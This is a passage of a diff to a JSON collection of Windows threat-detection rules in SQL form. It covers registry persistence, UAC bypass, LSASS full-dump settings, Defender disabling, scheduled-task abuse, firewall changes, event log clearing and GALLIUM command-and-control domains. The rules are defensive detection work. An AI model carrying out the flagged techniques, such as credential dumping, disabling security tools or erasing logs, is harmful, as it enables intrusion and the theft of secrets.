'\\' AND Details LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" ], - "filename": "registry_set_uac_bypass_winsat.yml" + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" }, { - "title": "Potential Persistence Via AutodialDLL", - "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "title": "Suspicious Application Installed", + "id": "83c161b6-ca67-4f33-8ad0-644a0737cf07", "status": "experimental", - "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the 
\"ws2_32\" library", + "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Packages or applications being legitimately used by users or administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '28115' AND (Name LIKE '%Zenmap%' ESCAPE '\\' OR Name LIKE '%AnyDesk%' ESCAPE '\\' OR Name LIKE '%wireshark%' ESCAPE '\\' OR Name LIKE '%openvpn%' ESCAPE '\\')) OR (EventID = '28115' AND (AppID LIKE '%zenmap.exe%' ESCAPE '\\' OR AppID LIKE '%prokzult ad%' ESCAPE '\\' OR AppID LIKE '%wireshark%' ESCAPE '\\' OR AppID LIKE '%openvpn%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_autodial_dll.yml" + "filename": "win_shell_core_susp_packages_installed.yml" }, { - "title": "Potential Attachment Manager Settings Attachments Tamper", - "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "title": "Scheduled Task Executed Uncommon LOLBIN", + "id": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "False positives may occur with some of the selected binaries if you have tasks using them (which could be very 
common in your environment). Exclude all the specific trusted tasks before using this rule" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND Details = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%\\\\calc.exe' ESCAPE '\\' OR Path LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Path LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Path LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR Path LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Path LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Path LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "registry_set_policies_attachments_tamper.yml" + "filename": "win_taskscheduler_lolbin_execution_via_task_scheduler.yml" }, { - "title": "Potential PendingFileRenameOperations Tamper", - "id": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", + "title": "Scheduled Task Executed From A Suspicious Location", + "id": "424273ea-7cf8-43a6-b712-375f925e481f", "status": "experimental", - "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot.", - "author": "frack113", + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.persistence", + "attack.t1053.005" ], 
"falsepositives": [ - "Installers and updaters may set currently in use files for rename after a reboot." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\PendingFileRenameOperations%' ESCAPE '\\') AND ((Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regedit.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_susp_pendingfilerenameoperations.yml" + "filename": "win_taskscheduler_execution_from_susp_locations.yml" }, { - "title": "Register New IFiltre For Persistence", - "id": "b23818c7-e575-4d13-8012-332075ec0a2b", + "title": "Important Scheduled Task Deleted", + "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", "status": "experimental", - "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. 
You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Legitimate registration of IFilters by the OS or software" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentHandler%' ESCAPE '\\') OR (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentAddinsRegistered\\\\{89BCB740-6119-101A-BCB7-00DD010655AF}%' ESCAPE '\\')) AND NOT (((TargetObject LIKE '%\\\\CLSID\\\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{4887767F-7ADC-4983-B576-88FB643D6F79}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\CLSID\\\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{9694E38A-E081-46ac-99A0-8743C909ACB6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{98de59a0-d175-11cd-a7bd-00006b827d94}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{B4132098-7A03-423D-9463-163CB07C151F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{d044309b-5da6-4633-b085-4ed02522e5a5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D169C14A-5148-4322-92C8-754FC9D018D8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{DD75716E-B42E-4978-BB60-1497B92E30C4}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E772CEB3-E203-4828-ADF1-765713D981B8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{eec97550-47a9-11cf-b952-00aa0051fe20}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image 
LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_ifilter.yml" + "filename": "win_taskscheduler_susp_schtasks_delete.yml" }, { - "title": "Lsass Full Dump Request Via DumpType Registry Settings", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", - "status": "experimental", - "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". 
Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", - "author": "@pbssubhash", + "title": "GALLIUM Artefacts - Builtin", + "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "status": "test", + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "author": "Tim Burrell", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Legitimate application that needs to do a full dump of their process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND Details = 'DWORD (0x00000002)')" + "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" ], - "filename": "registry_set_lsass_usermode_dumping.yml" + "filename": "win_dns_analytic_apt_gallium.yml" }, { - "title": "Potential Persistence Via Event Viewer Events.asp", - "id": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", - "status": "test", - "description": "Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1112" + "title": "New Firewall Rule Added In Windows Firewall Exception List", + "id": "cde0a575-7d3d-4a49-9817-b8004a7bf105", + "status": "experimental", + "description": "Detects 
when a rule has been added to the Windows Firewall exception list", + "author": "frack113", + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND NOT ((Action = '2') OR ((ApplicationPath LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ApplicationPath LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\Setup.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\dllhost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + ], + "filename": "win_firewall_as_add_rule.yml" + }, + { + "title": "Windows Defender Firewall Has Been Reset To Its Default Configuration", + "id": "04b60639-39c0-412a-9fbe-e82499c881a3", + "status": "experimental", + "description": "Detects activity when Windows Defender Firewall has been reset to its default configuration", + "author": "frack113", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID IN ('2032', '2060'))" + ], + "filename": "win_firewall_as_reset_config.yml" + }, + { + "title": "Windows Firewall Settings Have Been Changed", + "id": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", + "status": "experimental", + "description": "Detects activity when the settings of the Windows firewall have been changed", + "author": "frack113, Nasreddine Bencherchali 
(Nextron Systems)", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID IN ('2002', '2083', '2003', '2082', '2008'))" ], + "filename": "win_firewall_as_setting_change.yml" + }, + { + "title": "New Firewall Exception Rule Added For A Suspicious Folder", + "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", + "status": "experimental", + "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", + "author": "frack113", "falsepositives": [ - "Unknown" + "Any legitimate application that runs from the AppData user directory" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionURL%' ESCAPE '\\') AND NOT ((Image LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram' ESCAPE '\\' AND Details LIKE '\\%\\%SystemRoot\\%\\%\\\\PCHealth\\\\HelpCtr\\\\Binaries\\\\HelpCtr.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgramCommandLineParameters' ESCAPE '\\' AND Details LIKE '-url hcp://services/centers/support_topic=\\%\\%s' ESCAPE '\\') OR (Details = 'http://go.microsoft.com/fwlink/events.asp') OR (Details = '(Empty)')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND ((EventID IN ('2004', '2071') AND (ApplicationPath LIKE 
'%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2'))) AND NOT ((ApplicationPath LIKE '%\\\\AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_event_viewer_events_asp.yml" + "filename": "win_firewall_as_add_rule_susp_folder.yml" }, { - "title": "New File Association Using Exefile", - "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", - "status": "test", - "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", - "author": "Andreas Hunkeler (@Karneades)", - "tags": [ - "attack.defense_evasion" + "title": "A Rule Has Been Deleted From The Windows Firewall Exception List", + "id": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", + "status": "experimental", + "description": "Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall", + "author": "frack113", + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2006', '2052') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "falsepositives": [ - "Unknown" + "filename": "win_firewall_as_delete_rule.yml" + }, + { + "title": "The Windows Defender Firewall Service Failed To Load Group Policy", + "id": "7ec15688-fd24-4177-ba43-1a950537ee39", 
+ "status": "experimental", + "description": "Detects activity when The Windows Defender Firewall service failed to load Group Policy", + "author": "frack113", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2009')" ], + "filename": "win_firewall_as_failed_load_gpo.yml" + }, + { + "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", + "id": "79609c82-a488-426e-abcf-9f341a39365d", + "status": "experimental", + "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND Details = 'exefile' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2033', '2059') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "registry_set_file_association_exefile.yml" + "filename": "win_firewall_as_delete_all_rules.yml" }, { - "title": "COM Hijacking via TreatAs", - "id": "dc5c24af-6995-49b2-86eb-a9ff62199e82", + "title": "Firewall Rule Modified In The Windows Firewall Exception List", + "id": "5570c4d9-8fdd-4622-965b-403a5a101aa0", "status": "experimental", - "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", + "description": "Detects 
when a rule has been modified in the windows firewall exception list", "author": "frack113", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID IN ('2005', '2073') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + ], + "filename": "win_firewall_as_change_rule.yml" + }, + { + "title": "Sysmon Crash", + "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "status": "experimental", + "description": "Detects application popup reporting a failure of the Sysmon service", + "author": "Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%TreatAs\\\\(Default)' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" ], - "filename": "registry_set_treatas_persistence.yml" + "filename": "win_system_application_sysmon_crash.yml" }, { - "title": "Registry Explorer Policy Modification", - "id": "1c3121ed-041b-4d97-a075-07f54f20fb4a", - "status": "test", - 
"description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", - "author": "frack113", + "title": "Important Windows Eventlog Cleared", + "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "status": "experimental", + "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate admin script" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoLogOff' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoDesktop' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFind' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFileMenu' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoClose' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoSetTaskbar' ESCAPE '\\' OR TargetObject LIKE 
'%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoPropertiesMyDocuments' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoTrayContextMenu' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" ], - "filename": "registry_set_set_nopolicies_user.yml" + "filename": "win_system_susp_eventlog_cleared.yml" }, { - "title": "Windows Defender Service Disabled", - "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "title": "Eventlog Cleared", + "id": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", "status": "experimental", - "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", - "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "description": "One of the Windows Eventlogs has been cleared. e.g. 
caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Administrator actions" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND Details = 'DWORD (0x00000004)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog') AND NOT (Channel IN ('System', 'Security', 'Application')))" ], - "filename": "registry_set_disable_windows_defender_service.yml" + "filename": "win_system_eventlog_cleared.yml" }, { - "title": "Winlogon Notify Key Logon Persistence", - "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", + "title": "DHCP Server Loaded the CallOut DLL", + "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "status": "test", - "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", - "author": "frack113", + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "author": "Dimitrios Slamaris", "tags": [ 